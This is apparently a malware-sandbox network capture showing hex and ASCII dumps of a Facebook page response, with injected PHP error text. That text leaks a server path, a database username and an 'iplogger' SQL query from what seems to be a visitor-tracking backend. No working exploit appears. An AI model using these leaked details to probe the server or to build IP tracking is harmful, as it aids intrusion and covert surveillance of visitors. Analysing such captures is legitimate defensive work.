2022-10-07 13:59:49 UTC	1081	IN	Data Raw: 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 Data Ascii: to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u
2022-10-07 13:59:49 UTC	1082	IN	Data Raw: 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 Data Ascii: ase.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/w
2022-10-07 13:59:49 UTC	1084	IN	Data Raw: 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 Data Ascii: 02520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u
2022-10-07 13:59:49 UTC	1085	IN	Data Raw: 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 Data Ascii: 53Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u
2022-10-07 13:59:49 UTC	1087	IN	Data Raw: 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 Data Ascii: C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20
2022-10-07 13:59:49 UTC	1087	IN	Data Raw: 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 Data Ascii: 00%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u0025
2022-10-07 13:59:49 UTC	1088	IN	Data Raw: 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f Data Ascii: u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520colo
2022-10-07 13:59:49 UTC	1090	IN	Data Raw: 33 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 Data Ascii: 3A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E
2022-10-07 13:59:49 UTC	1091	IN	Data Raw: 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 Data Ascii: l%253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageF
2022-10-07 13:59:49 UTC	1093	IN	Data Raw: 54 57 56 61 5f 45 68 6a 4e 54 33 34 35 71 70 52 46 39 7a 64 34 66 65 64 6f 72 6b 4c 53 47 67 5a 37 64 44 36 33 75 4d 78 43 36 59 31 63 52 77 41 2d 32 71 50 59 66 75 50 77 68 59 48 61 69 4c 31 6a 6f 4e 75 43 51 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 68 6f 76 65 72 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 Data Ascii: TWVa_EhjNT345qpRF9zd4fedorkLSGgZ7dD63uMxC6Y1cRwA-2qPYfuPwhYHaiL1joNuCQ" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="hover">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulle
2022-10-07 13:59:49 UTC	1094	IN	Data Raw: 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 Data Ascii: and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about A
2022-10-07 13:59:49 UTC	1096	IN	Data Raw: 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 46 6d 51 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 77 37 67 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 58 66 59 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 50 31 4d 22 7d 2c 22 32 35 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 47 4a 37 73 7a 6f 42 42 74 47 44 58 78 71 53 6f 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 Data Ascii: ":"AT7B-2KeH1gOOVfLFmQ"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOAw7g"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq4XfY"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZP1M"},"2526":{"result":true,"hash":"AT4GJ7szoBBtGDXxqSo"},"819236":{"result
2022-10-07 13:59:49 UTC	1097	IN	Data Raw: 52 73 51 55 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 34 31 35 32 34 7d 2c 22 72 73 72 63 4d 61 70 22 3a 7b 22 6e 36 57 34 78 4d 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 4c 41 Data Ascii: RsQU"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006341524},"rsrcMap":{"n6W4xMH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yF\/l\/en_US\/BLA
2022-10-07 13:59:49 UTC	1099	IN	Data Raw: 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6d 32 6c 32 6a 6c 4c 79 46 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 Data Ascii: .php\/v3\/yU\/r\/Jm2l2jlLyF6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"h3ZzAmG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v
2022-10-07 13:59:49 UTC	1100	IN	Data Raw: 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 78 5c 2f 72 5c 2f 58 44 44 2d 50 31 58 39 38 4b 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 38 5c 2f 72 5c 2f 53 69 78 4d 30 33 41 58 45 77 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 Data Ascii: \/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/XDD-P1X98Kq.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/SixM03AXEw8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IaR\/6uP":{"type":"js","src":"https:\/\/stat
2022-10-07 13:59:49 UTC	1102	IN	Data Raw: 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 49 77 41 32 57 36 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 51 78 68 59 47 51 37 65 31 4b 30 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 52 70 44 77 6d 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 4d 2d 43 32 73 4c 46 4a 50 30 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c Data Ascii: ","nc":1},"hIwA2W6":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/QxhYGQ7e1K0.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"mRpDwmd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/M-C2sLFJP0M.js?_nc_x=Ij3Wp8l
2022-10-07 13:59:49 UTC	1103	IN	Data Raw: 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 73 56 46 6f 31 75 63 36 49 34 50 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 79 75 55 30 35 61 47 58 33 7a 35 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 30 52 57 4b 4f 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 Data Ascii: et\/rsrc.php\/v3\/yH\/l\/0,cross\/sVFo1uc6I4P.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/l\/0,cross\/yuU05aGX3z5.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"0RWKOAc":{"type":"js","src":"https:\/\/st
2022-10-07 13:59:49 UTC	1105	IN	Data Raw: 2c 22 6b 4f 45 48 76 70 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 6e 53 5a 37 34 46 46 2d 7a 79 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 59 65 33 48 37 45 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 77 4e 34 5c 2f 79 5f 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5f 4a 47 43 51 67 35 6b 69 4c 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e Data Ascii: ,"kOEHvpu":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/nSZ74FF-zyM.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"6Ye3H7E":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iewN4\/y_\/l\/en_US\/_JGCQg5kiLh.js?_nc_x=Ij3Wp8lg5Kz","n
2022-10-07 13:59:49 UTC	1106	IN	Data Raw: 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 78 5c 2f 41 67 70 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4c 5c 2f 72 5c 2f 7a 79 61 4b 33 56 44 67 5a 47 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 36 51 77 57 56 49 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 Data Ascii: tatic.xx.fbcdn.net\/rsrc.php\/v3\/yv\/r\/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dx\/AgpO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/zyaK3VDgZGc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"L6QwWVI":{"type":"css","src":"https:\/\/static
